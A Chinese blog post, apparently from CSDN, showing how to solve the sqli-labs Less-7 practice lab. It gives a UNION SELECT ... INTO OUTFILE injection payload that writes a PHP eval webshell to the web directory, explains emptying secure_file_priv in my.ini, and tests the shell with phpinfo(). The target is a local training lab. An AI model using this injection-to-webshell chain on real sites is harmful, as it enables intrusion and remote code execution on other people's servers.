一句话木马、security_file_priv、into outfile、my.ini、sqli-labs-Less7

最新推荐文章于 2022-09-21 14:21:26 发布
最新推荐文章于 2022-09-21 14:21:26 发布
阅读量786 收藏
点赞数 1
分类专栏: sql注入 文章标签: 服务器 数据库 网络安全 web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51756263/article/details/125821625
版权

sqli-labs-Less7闯关会用到一句话木马 

http://127.0.0.1/Less-7/?id=-1')) union select 1,"<?php @eval($_GET['a']); ?>",2 into outfile 'C:\\hackfiles\\sqli-labs-master\\Less-7\\muma.php'--+

创建一个文件将<?php @eval($GET_["a"]); ?>这行代码写入

如果写入的一句话木马文件没有出现在目录中,可能是没有在数据库中规定导入、导出文件的路径目录
secure_file_priv 等于 null 了,这时候我们要在数据库配置文件(my.ini)中将secure_file_priv参数的改为,即 secure_file_priv =        如下图所示,这样就表示了可以在任意路径目录下导入、导出文件,若配置文件中没有找到参数secure_file_priv我们就要自己添加上,添加完后记得重启数据库

这样就可以在指定的目录下看到木马文件

点进muma.php可以看到一下画面:

可以先测试一下一句话木马有没有注入成功:
所以令a=phpinfo()    ,即

可以得到以下画面:

 发现注入成功。
 

 

 

头顶蜘蛛网,脚踩大水缸
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
详述 MySQL 导出数据遇到 secure-file-priv 的问题
CG国斌的博客
10-01 3万+
ERROR 1290 (HY000): The MySQL server is running with the –secure-file-priv option so it cannot execute this statement. 对于上述错误,相信对于第一次执行 MySQL 数据导出操作的同学大都会遇见。至于为什么会遇到这个错误,原因很简单,那就是:我们不知道 MySQL 默认的导出目录是哪
SELECT ... INTO OUTFILE中面临的secure_file_priv问题
weixin_34082854的博客
08-07 311
2019独角兽企业重金招聘Python工程师标准>>> ...
MySQL 全局配置 --secure-file-priv
zaihukeji的博客
08-20 2万+
一则问题 在执行导出INFORMATION_SCHEMA.OPTIMIZER_TRACE内容到本地文件时: SELECT TRACE INTO DUMPFILE "optimizer_trace.txt" FROM INFORMATION_SCHEMA.OPTIMIZER_TRACE; 报错提示如下: (1290, 'The MySQL server is running with the --secure-file-priv option so it cannot execute this..
导出数据提示--secure-file-priv选项问题的解决方法
jacklin_01的博客
05-30 6711
mysql可使用into outfile参数把表中数据导出到csv,例如可用以下命令把user表的数据导出到user.csv 1 select * from user into outfile '/tmp/user.csv' fields terminated by ',' optionally enclosed by '"' lines terminated by '\r\n 执行后,user表的数据会导出到/tmp/user.csv。 参数说明: int..
宝塔面板修改secure_file_priv设置
FY603438169的博客
09-21 2150
宝塔面板修改secure_file_priv设置
Windows下MySQL8.0中secure_file_priv为NULL解决办法
12-14
后来想导出数据库里面的一些数据,提示我secure_file_priv=null,报错,后来网上找了很多方法,说只需要在my.ini里面加一行secure_file_priv=””(或者是你自己想要的路径,如”D:/MySQL”),然后重启mysql (用...
Mysql注入中的outfile、dumpfile、load_file函数详解
09-09
在这个话题中,我们将深入探讨三个与文件操作相关的MySQL函数:`INTO OUTFILE`、`INTO DUMPFILE`和`LOAD_FILE()`,它们在SQL注入攻击中扮演着重要角色。 1. `INTO OUTFILE`: 这个函数用于将查询结果直接导出到一...
GDAL.rar_GDAL_VC gdal _gdal_priv.h pudn
09-19
GDAL,全称为Geospatial Data Abstraction Library,是一个开源的地理空间数据处理库,用于读取、写入和操作多种格式的地理空间数据。在本压缩包“GDAL.rar”中,包含的是预编译的GDAL库,特别为VC(Visual C++)...
信息安全_数据安全_Zero-knowledge_proofs_(ZKP):Priv.pdf
08-23
信息安全_数据安全_Zero-knowledge_proofs_(ZKP):Priv 安全测试 安全分析 移动安全 业务安全 安全实践
xfs_dir2_priv.rar_V2
09-14
在Linux操作系统中,XFS文件系统是一种高性能、高可靠性的日志文件系统,被广泛应用于大数据存储和处理场景。在XFS的实现中,目录(directory)是文件系统的关键组成部分,它负责管理和组织文件。在Linux v2.13.6...
MYSQL新特性secure_file_priv 读写文件
热门推荐
终码一生
02-08 17万+
1290 – The MySQL server is running with the –secure-file-priv option so it cannot execute this statement secure-file-priv特性 secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定...
详解步骤!!MYSQL导入数据出现secure-file-priv 的解决办法!
qq_41972223的博客
11-29 1万+
ERROR 1290 (HY000): The MySQL server is running with the –secure-file-priv option so it cannot execute this statement. 今天做MySQL实验,导入文件的时候出现了这个错误,之后百度教程,结果一步步导致错误越来越多,实验做了一半,剩下的时间都用来改配置了,刚刚自己摸索了半天终于把错误...
记录一个mysql8.0的安装过程
yeyuangongzuoshi的博客
03-28 708
先配置my.ini: [mysqld] # 设置3306端口 port=3306 # 设置mysql的安装目录 basedir=D:\mysql\mysql-8.0.23 # 设置mysql数据库的数据的存放目录 datadir=D:\mysql\mysql-8.0.23\data # 允许最大连接数 max_connections=200 # 允许连接失败的次数。这是为了防止有人从该主机试图攻击数据库系统 max_connect_errors=10 # 服务端使用的字符集默认为UTF8 character
mysql中secure_file_priv=不生效的问题
kfjrlgagkogkhpa的博客
03-17 7059
mysql中secure_file_priv=不生效的问题
mysql配置secure_file_priv
jkzyx123的博客
09-06 8395
secure_file_priv 配置项控制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()的使用权限。
Mysql中secure_file_priv对读写文件的影响
Jiajiajiang_的博客
01-10 3048
ERROR 1290 (HY000): The MySQL server is running with the –secure-file-priv option so it cannot execute this statement. secure_file_priv是用来限制LOAD DATA,SELECT...OUTFILE,and LOAD_FILE()传到哪个指定目录的 secur...
MYSQL新特性secure_file_priv对读写文件的影响
weixin_34026484的博客
05-08 616
1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement secure-file-priv特性secure-file-priv参数是用来限制LOAD DATA, SELECT ... O...
centos MYSQL导入数据出现secure-file-priv 的解决办法
wang_quan_li的专栏
04-25 620
首先在MySQL中输入 show variables like ‘%secure%’;查看 secure-file-priv 当前的值是什么 如若不是空值,在my.cnf里修改secure-file-priv='',没有就增加这个配置 之后重启mysql,systemctl restart mysqld select * from tableinto outfile '~/dataxweb.txt';注意此处的路径中的~并不是home目录下的用户目录,而是/var/lib/mysql/目录。 ...
mysql5.7导出数据提示–secure-file-priv选项问题的解决方法
Bertram的博客
06-21 6761
错误提示 mysql5.7导出数据提示–secure-file-priv选项问题的解决方法 MYSQL导入数据出现ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement mysql可使用 into outfile参数把某表中数据导出到一个文件中,例如可用以下命令把user表的数据导出到user.txt select * in
怎样在 MySQL 安装路径下的 my.ini 文件中添加secure_file_priv=设置路径语句,然后重启服务即可
最新发布
06-01
在 MySQL 安装路径下的 my.ini 文件中添加 secure_file_priv=设置路径语句的步骤如下: 1. 找到 my.ini 文件:在电脑上搜索 my.ini 文件,一般在 MySQL 安装路径下的 bin 目录中。 2. 打开 my.ini 文件:使用文本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值